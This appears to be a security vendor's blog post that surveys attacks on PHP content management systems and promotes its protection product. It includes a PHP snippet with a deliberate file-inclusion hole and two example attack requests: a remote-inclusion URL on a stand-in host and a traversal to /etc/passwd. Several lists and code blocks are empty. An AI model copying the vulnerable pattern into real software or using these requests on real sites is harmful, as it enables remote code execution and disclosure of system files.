Nowadays, the Internet plays a huge part in our lives. It gets bigger and bigger every day, now it has more than one billion websites. Most of these sites are built with CMS which stands for Content Management System. It is a tool that provides an easy-to-use method for users without any programming skills in creating websites.
The most common CMSs are written in PHP because most shared-hosting providers only provide this way to share/operate your website with the community. According to the statistics, WordPress has the largest market share with 52%, followed by Joomla with only 6%.
The most common problem with open-source CMSs is security. You only get support from the community and you hear all the time that “More eyes, fewer vulnerabilities, greater security” from the open-source guys. But there is also a problem with this. The code is open-source, so anyone can study the system and can discover vulnerabilities that can be exploited.
Anybody can create a plugin or template which has its own bugs, and it will become outdated if the developer will not maintain that, but these are unusual targets for hackers. They search for security holes in the core modules, extensions and in the configuration settings.
The main reasons for finding these holes are:
The most commonly used attacks are:
Let’s check out these attack types.
SQL injection is a data-driven code injection technique, which allows attackers to the spoof identification, data manipulation create/change/destroy), or privilege escalation. SQL injection is one of the top 10 web application vulnerabilities.
You can find more information about this attack type in our previous blog post.
This attack type is most commonly used in affecting web applications that are relying on a scripting runtime. This happens, when the application creates an executable path which uses the attacker-controlled variable, thus allowing the attacker to control which file is executed at runtime. This attack has two types:
RFI occurs when the web application downloads and runs a remote file, on the other hand, LFI includes local files that contain attacker-controlled data (such as access logs, or previously uploaded files).
A minimal example for this:
1. 2. if ( isset( $_GET['theme'] ) ) {
3. include( $_GET['theme'] . '.php' );
4. }
5. ?>
For the client side:
1.
2.
7.
8.
A common request looks like:
1. /gettheme.php?theme=classic
But if we switch it to an URL address or to a common Unix/Linux file, then we can get some information about the system which runs the web page or we can also execute a remote code:
1. /gettheme.php?theme=http://verydangerous.com/danger.txt
2. /gettheme.php?theme=../../../../etc/passwd
Cross-Site Scripting (XSS) allows attackers to inject client-side scripts into web pages in order to obtain user credentials, deface web sites, or to insert malicious contents. It has many types, such as reflected (aka non-persistent), persistent, Self-XSS or Mutated XSS (mXSS). Fortunately, Bitninja can protect you from these attack types. For further information, please check it out our blog post.
Comment spamming is an uncommon attack type because of Captcha, reCaptcha (v1/v2), and other types of challenge-response tests.
The attacker posts random comments automatically in order to make his own site more visible for the search engines, show links to malicious websites, unwanted advertisements, etc.. Websites with comment posting option are targeted by this type of attack.
Allows the attacker to execute operating system commands in a system shell with the same privileges as the vulnerable application. It commonly gets used by another vulnerability which uses it for uploading its own custom web applications in order to facilitate its work
We mostly catch requests to WSO, which is a PHP WebShell application.
With this web application tool, you get a lot of information about the server where the script is running, and you also get a File Manager, a Brute Force Tool for SQL, and a simple console for executing system commands on the server.
It is a rare and not efficient type of attack. It is mostly used as a DOS (Denial of Service) attack because if the attacker uploads harmful files, or overwrites critical files, then your server will be unstable or you can get another type of attack from harmful files. The attacker (if there are no quota limits enabled on the server) can fill up disk space on the server by uploading large files to it or by uploading a lot of small files which leads to an inode exhaustion.
As you can see, the hackers have a wide selection of attack types and with them, they can DOS your site or they can even get their hands on sensitive information that are in your possession. Luckily, BitNinja can protect you with these modules:
